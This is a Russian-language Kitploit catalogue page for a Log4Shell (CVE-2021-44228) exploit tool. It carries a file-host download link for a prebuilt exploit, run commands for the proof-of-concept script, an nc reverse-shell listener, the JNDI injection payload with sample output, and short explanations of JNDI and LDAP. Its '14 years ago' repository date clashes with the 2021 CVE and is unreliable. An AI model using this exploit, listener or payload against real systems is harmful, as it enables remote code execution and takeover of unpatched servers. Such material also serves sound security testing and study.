Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4j-Exploit-CVE-2021-44228 — Инструмент эксплойта для CVE-2021-44228 (Log4Shell), который настраивает вредоносный LDAP-сервер и доставляет Java-полезную нагрузку для достижения удаленного выполнения кода на уязвимых приложениях Log4j. | Kitploit
Инструменты/GitHubGitHub/willian-2-0-0-1/log4j-exploit-cve-2021-44228
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubwillian-2-0-0-1/log4j-exploit-cve-2021-44228

Log4j-Exploit-CVE-2021-44228

Инструмент эксплойта для CVE-2021-44228 (Log4Shell), который настраивает вредоносный LDAP-сервер и доставляет Java-полезную нагрузку для достижения удаленного выполнения кода на уязвимых приложениях Log4j.

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4j-Exploit-CVE-2021-44228

Инструмент тестирования уязвимости Log4Shell https://log4shell.tools/

Эксплойт с уже включенным java, чтобы избежать создания учетной записи и т.д..

root@kitploit:~
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
root@kitploit:~
nc -lvnp 9001
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Основная концепция log4j

Что такое JNDI

Это интерфейс, API Java для службы каталогов, который позволяет клиентам Java-программного обеспечения обнаруживать и искать данные и ресурсы по имени.

Что такое LDAP

Это протокол доступа к каталогу. LDAP может использоваться для проверки имен пользователей и паролей с серверами Docker, Jenkins, Kubernetes, Open VPN и Linux Samba. Единый вход LDAP также может использоваться системными администраторами для управления доступом к базе данных LDAP.

ДЛЯ ТЕХ, КТО ХОЧЕТ УЗНАТЬ БОЛЬШЕ ОБ УЯЗВИМОСТИ, СМ. ДОКУМЕНТАЦИЮ НИЖЕ:

https://www.lunasec.io/docs/blog/log4j-zero-day/

ЭКСПЛОЙТ БЕЗ ВКЛЮЧЕННОГО JAVA

https://github.com/kozmer/log4j-shell-poc
Скачать инструмент